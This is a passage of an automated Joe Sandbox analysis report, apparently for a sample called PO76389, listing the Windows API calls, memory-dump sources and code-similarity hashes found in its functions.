                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Rect$Client$Window$Screen
                                                    • String ID:
                                                    • API String ID: 1296646539-0
                                                    • Opcode ID: 330fbf6d516446e71de442bfc92dafb71151862e586635cf1edcf4686dba4628
                                                    • Instruction ID: f0e8ddc13f7a4569134f7607266501a819215f1e209eabdc556f42abff2c873f
                                                    • Opcode Fuzzy Hash: 330fbf6d516446e71de442bfc92dafb71151862e586635cf1edcf4686dba4628
                                                    • Instruction Fuzzy Hash: DBB15E7990024ADBDF50CFA8C580BEEBBB1FF08310F14952AEC59DB254DB34A941DB69
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 3253778849-0
                                                    • Opcode ID: a6596f675ec6b40a5928b08ee159ca7fe485536372524fd3a225e8330faaf814
                                                    • Instruction ID: 0a1810820ef45f6e83d32352d29605bd23edb81ed51495a415058847e285608d
                                                    • Opcode Fuzzy Hash: a6596f675ec6b40a5928b08ee159ca7fe485536372524fd3a225e8330faaf814
                                                    • Instruction Fuzzy Hash: FE617F3050025E9BDB01EF66CC81FFE77A9AF44308F04445EF9555B292EB39AD05CB69
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                      • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00512FA0
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00512FE0
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00513003
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0051302C
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0051306F
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0051307C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                    • String ID:
                                                    • API String ID: 4046560759-0
                                                    • Opcode ID: a18a66cfe85c79658f8e934401d6e7fec2fabcac15eb77018e59fb0bb3fddc0f
                                                    • Instruction ID: ce0290f9d0c8dd88b20387a597c2dc048fe58fac0b81dd6e402a1961ace88512
                                                    • Opcode Fuzzy Hash: a18a66cfe85c79658f8e934401d6e7fec2fabcac15eb77018e59fb0bb3fddc0f
                                                    • Instruction Fuzzy Hash: 23519C31108200AFD704EF65C895EAEBBF9FF88708F04481EF585872A1EB75E955DB62
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$_wcscat
                                                    • String ID:
                                                    • API String ID: 2037614760-0
                                                    • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                    • Instruction ID: 7937496c4293db010549e46e08b51f924a4bed2734a37bb43fdbc1528cb0d048
                                                    • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                    • Instruction Fuzzy Hash: 08510078D00115AACB51AF99C490EBEB7B0EF05314F50406FF981AB292DBBC5F82D799
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 004F2AF6
                                                    • VariantClear.OLEAUT32(00000013), ref: 004F2B68
                                                    • VariantClear.OLEAUT32(00000000), ref: 004F2BC3
                                                    • _memmove.LIBCMT ref: 004F2BED
                                                    • VariantClear.OLEAUT32(?), ref: 004F2C3A
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004F2C68
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                    • String ID:
                                                    • API String ID: 1101466143-0
                                                    • Opcode ID: f55b4bf004f45d7d83c7a163b372b02e2f2a9b1bb242a4edad8d3818482efd97
                                                    • Instruction ID: 6975cc74dcef57d370c4218ce62fe3bd389cdea5771becee41b5db58082ba9ac
                                                    • Opcode Fuzzy Hash: f55b4bf004f45d7d83c7a163b372b02e2f2a9b1bb242a4edad8d3818482efd97
                                                    • Instruction Fuzzy Hash: 91517EB5A00209EFDB14CF58C880AAAB7B8FF4C314B15855AEE49DB310E374E951CFA4
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 0051833D
                                                    • GetMenuItemCount.USER32(00000000), ref: 00518374
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0051839C
                                                    • GetMenuItemID.USER32(?,?), ref: 0051840B
                                                    • GetSubMenu.USER32(?,?), ref: 00518419
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0051846A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: 776a12a8760ae7d513aa867494721d0616b810f38b90441778e079b9826e1047
                                                    • Instruction ID: ebf9cd61160008367a40abc72893217cb465169dd76540bb35cdd9e62a3a6427
                                                    • Opcode Fuzzy Hash: 776a12a8760ae7d513aa867494721d0616b810f38b90441778e079b9826e1047
                                                    • Instruction Fuzzy Hash: 3A51AD71A00215AFDF11EF65C841AEEBBF4FF48714F14445AE911BB351CB74AE418BA4
                                                    APIs
                                                    • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00509409
                                                    • WSAGetLastError.WS2_32(00000000), ref: 00509416
                                                    • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0050943A
                                                    • _strlen.LIBCMT ref: 00509484
                                                    • _memmove.LIBCMT ref: 005094CA
                                                    • WSAGetLastError.WS2_32(00000000), ref: 005094F7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_memmove_strlenselect
                                                    • String ID:
                                                    • API String ID: 2795762555-0
                                                    • Opcode ID: f32e6968a75d1aa439906944729004a7eb322dd64025741041ae0c897f88ee26
                                                    • Instruction ID: fbf90154d12eedcd990d4b7608ed1a090781aa1ae6fed43b5e471f0803425d0d
                                                    • Opcode Fuzzy Hash: f32e6968a75d1aa439906944729004a7eb322dd64025741041ae0c897f88ee26
                                                    • Instruction Fuzzy Hash: C441AE75500208AFCB04EB65CC85EEEBBB9FF48314F10816AF516972D2DB34AE05CB60
                                                    APIs
                                                    • _memset.LIBCMT ref: 004F552E
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004F5579
                                                    • IsMenu.USER32(00000000), ref: 004F5599
                                                    • CreatePopupMenu.USER32 ref: 004F55CD
                                                    • GetMenuItemCount.USER32(000000FF), ref: 004F562B
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 004F565C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                    • String ID:
                                                    • API String ID: 3311875123-0
                                                    • Opcode ID: c71b744620609d3d18917bfbc01069b0a32ff7fa089c8aa5060d3f749afc0c19
                                                    • Instruction ID: 28ba749e939a594dd7fb44ad7c88e1317dae7c14718c3971afe725b0ab9dca8f
                                                    • Opcode Fuzzy Hash: c71b744620609d3d18917bfbc01069b0a32ff7fa089c8aa5060d3f749afc0c19
                                                    • Instruction Fuzzy Hash: 1251B070600A0DABEF10CF68D888BBEBBF5AF15318F50411AE729DA290D7789945CB59
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 004CB1C1
                                                    • GetWindowRect.USER32(?,?), ref: 004CB225
                                                    • ScreenToClient.USER32(?,?), ref: 004CB242
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004CB253
                                                    • EndPaint.USER32(?,?), ref: 004CB29D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                    • String ID:
                                                    • API String ID: 1827037458-0
                                                    • Opcode ID: 6676ec77fe4bc21e51be4596f6b1c3508e87bdee7c942656d159191fbc4a1b9f
                                                    • Instruction ID: 7874a76e0149a7acf3b9d3705c23edc4bf370fe3c2a296813cec8d099864fdb3
                                                    • Opcode Fuzzy Hash: 6676ec77fe4bc21e51be4596f6b1c3508e87bdee7c942656d159191fbc4a1b9f
                                                    • Instruction Fuzzy Hash: 6641E2741006009FC711DF28EC89F6A3BF8FF59364F04056DF9A9872A1C7359849EBA6
                                                    APIs
                                                    • ShowWindow.USER32(00571810,00000000,?,?,00571810,00571810,?,0052E2D6), ref: 0051E21B
                                                    • EnableWindow.USER32(00000000,00000000), ref: 0051E23F
                                                    • ShowWindow.USER32(00571810,00000000,?,?,00571810,00571810,?,0052E2D6), ref: 0051E29F
                                                    • ShowWindow.USER32(00000000,00000004,?,?,00571810,00571810,?,0052E2D6), ref: 0051E2B1
                                                    • EnableWindow.USER32(00000000,00000001), ref: 0051E2D5
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0051E2F8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 5228377e015edea38973caa90c75da993e6daf3ce14082394c5fa14aa6895d98
                                                    • Instruction ID: 3546bf9686f9a80ed057385eb56ef19f2a00f5fb75e37e63064e60d5eb63e8fa
                                                    • Opcode Fuzzy Hash: 5228377e015edea38973caa90c75da993e6daf3ce14082394c5fa14aa6895d98
                                                    • Instruction Fuzzy Hash: F5412F38600141EFEB26CF54C4AABD47FF5BB06314F1841B9EE698F6A2C771A885CB51
                                                    APIs
                                                      • Part of subcall function 004CB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004CB5EB
                                                      • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB5FA
                                                      • Part of subcall function 004CB58B: BeginPath.GDI32(?), ref: 004CB611
                                                      • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB63B
                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0051E9F2
                                                    • LineTo.GDI32(00000000,00000003,?), ref: 0051EA06
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0051EA14
                                                    • LineTo.GDI32(00000000,00000000,?), ref: 0051EA24
                                                    • EndPath.GDI32(00000000), ref: 0051EA34
                                                    • StrokePath.GDI32(00000000), ref: 0051EA44
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                    • String ID:
                                                    • API String ID: 43455801-0
                                                    • Opcode ID: d2593965ad0bf725c7f0d93b00a092b1bda49bf17d41e4cd17d2ffcfc71d2507
                                                    • Instruction ID: 643d328a20b7ec3427f02f8ae0288b23a10ba5844ff61633ec2c23deef71cbc5
                                                    • Opcode Fuzzy Hash: d2593965ad0bf725c7f0d93b00a092b1bda49bf17d41e4cd17d2ffcfc71d2507
                                                    • Instruction Fuzzy Hash: C711FA76000149BFEB059F94EC88E9A7FBDEB14354F048011FE0945160D7719D99EBA0
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 004EEFB6
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 004EEFC7
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004EEFCE
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004EEFD6
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 004EEFED
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 004EEFFF
                                                      • Part of subcall function 004EA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,004EA79D,00000000,00000000,?,004EAB73), ref: 004EB2CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                                    • String ID:
                                                    • API String ID: 603618608-0
                                                    • Opcode ID: 4481edb820f0e669826e43e9f96b20f4a0e4fbc5a0d29324cf7fedd427e6b3a4
                                                    • Instruction ID: 60e54d41d131b86f2eb7ef45a516b6905322ce6bbbdaa560f3ce4554bb406440
                                                    • Opcode Fuzzy Hash: 4481edb820f0e669826e43e9f96b20f4a0e4fbc5a0d29324cf7fedd427e6b3a4
                                                    • Instruction Fuzzy Hash: 1901A775A00345BFEB109BA69C49B5EBFB8EB48751F004066FE08AB380D6709C04DF61
                                                    APIs
                                                    • __init_pointers.LIBCMT ref: 004D87D7
                                                      • Part of subcall function 004D1E5A: __initp_misc_winsig.LIBCMT ref: 004D1E7E
                                                      • Part of subcall function 004D1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004D8BE1
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004D8BF5
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004D8C08
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004D8C1B
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004D8C2E
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004D8C41
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004D8C54
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004D8C67
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004D8C7A
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004D8C8D
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004D8CA0
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004D8CB3
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004D8CC6
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004D8CD9
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004D8CEC
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 004D8CFF
                                                    • __mtinitlocks.LIBCMT ref: 004D87DC
                                                      • Part of subcall function 004D8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0056AC68,00000FA0,?,?,004D87E1,004D6AFA,005667D8,00000014), ref: 004D8AD1
                                                    • __mtterm.LIBCMT ref: 004D87E5
                                                      • Part of subcall function 004D884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004D89CF
                                                      • Part of subcall function 004D884D: _free.LIBCMT ref: 004D89D6
                                                      • Part of subcall function 004D884D: RtlDeleteCriticalSection.NTDLL(0056AC68), ref: 004D89F8
                                                    • __calloc_crt.LIBCMT ref: 004D880A
                                                    • GetCurrentThreadId.KERNEL32 ref: 004D8833
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                    • String ID:
                                                    • API String ID: 2942034483-0
                                                    • Opcode ID: f9cb3653ee175faf567ea2c99537766e9cb29bc504c808c6f5fe7be080a290f4
                                                    • Instruction ID: 47d3f3caf5185a32e243b615c5a570ff0fd4230a1330d7313abbb475acc47f66
                                                    • Opcode Fuzzy Hash: f9cb3653ee175faf567ea2c99537766e9cb29bc504c808c6f5fe7be080a290f4
                                                    • Instruction Fuzzy Hash: FBF090321197115AE664773E7C27A7B26D18F01778B600A2FF460D63E2FF588841556C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
